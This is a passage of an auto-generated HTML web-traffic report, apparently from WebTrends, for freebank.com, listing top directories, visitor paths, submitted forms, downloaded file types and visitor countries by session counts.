<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/_vti_bin">http://www.freebank.com/_vti_bin</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">44</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.06%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">100%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">52K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">33</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/admin">http://www.freebank.com/admin</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">33</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">96.96%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">311K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">19</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/cos">http://www.freebank.com/cos</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">30</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.04%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">96.66%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">17</TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopPaths"><!--Resources Accessed::Top Paths Through Site--></A>
<!-- WT_H1>Top Paths Through Site</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Paths Through Site</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the paths people most often follow when visiting the site. The path begins at the page of entry and shows the next six consecutive pages viewed.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, .3, 4.1, .8
, .8
</WT_TABLE_STATS -->
<CENTER><B>Top Paths Through Site</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Top Paths Through Site</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Pages</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/index.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">37.48%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2937</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbf_bye.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.6%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">361</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/forrest.asp</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.21%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">330</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbf_1875-07.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.45%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">271</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbf_pics.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.09%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">164</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbf_essay_gl_01.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.44%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">113</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/index.htm</B><BR><I>2. http://www.freebank.com/nbf_pics.htm</I><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.39%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">109</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbf_books.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.37%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">108</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbfgad.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.21%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">95</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbf_controversies.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.19%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">94</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Paths Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>58.47%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>4582</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopForms"><!--Resources Accessed::Most Submitted Forms--></A>
<!-- WT_H1>Most Submitted Forms and Scripts</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Submitted Forms and Scripts</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the most popular forms or scripts executed by the server. WebTrends counts any line with a Post command or a Get command with a "?" as a form or script, and shows only successful hits.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index05.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 2.7, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Most Submitted Forms & Scripts</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Most Submitted Forms</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Forms and/or Scripts</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>No. of Forms</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><I><A href="http://www.freebank.com/banklogin.asp">http://www.freebank.com/banklogin.asp</A></I></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">100%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopExtensions"><!--Resources Accessed::Most Downloaded File Types--></A>
<!-- WT_H1>Most Downloaded File Types and Sizes</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Downloaded File Types and Sizes</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the accessed file types and the total kilobytes downloaded for each file type. Cached requests and erred hits are excluded from the totals.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index06.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, .3, 3.7, 1, 1</WT_TABLE_STATS -->
<CENTER><B>Most downloaded File Types</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Most Downloaded File Types</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>File type</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Files</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>K Bytes Transferred</B></CENTER></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>gif</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20479</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">139,325K</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>htm</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14721</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">226,990K</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>jpg</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12128</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">388,415K</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>class</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7879</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">56,956K</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>asp</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1033</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">65K</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>*.</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">102</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">29K</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>txt</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">78</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7,182K</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>html</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">75</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">61K</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>dll</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">44</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">52K</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>ida</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">33</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6K</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total Files & K Bytes Transferred</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>56572</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>819,077K</B></TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopCountries"><!--Visitors & Demographics::Most Active Countries--></A>
<!-- WT_H1>Most Active Countries</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Active Countries</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the top locations of the visitors to the site by country. The country of the user is determined by the suffix of their domain name. Use this information carefully because this information is based on where the domain name of the visitor is registered, and may not always be an accurate identifier of the actual geographic location of this visitor (for example, while a vast majority of .com domain
names are from the United States, there is a small minority of domain
names that exist outside of the United States.)<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index07.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>3, .3, 4.7, 1</WT_TABLE_STATS -->
<CENTER><B>Most Active Countries</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Most Active Countries</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Countries</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>United States </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>7453</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>United States </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>7453</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>United States </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>7453</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>United States </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>7453</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>United States </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>7453</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Canada </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>108</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Canada </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>108</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Canada </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>108</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Canada </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>108</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Canada </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>108</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Australia </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>62</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Australia </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>62</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Australia </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>62</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Australia </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>62</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Australia </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>62</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
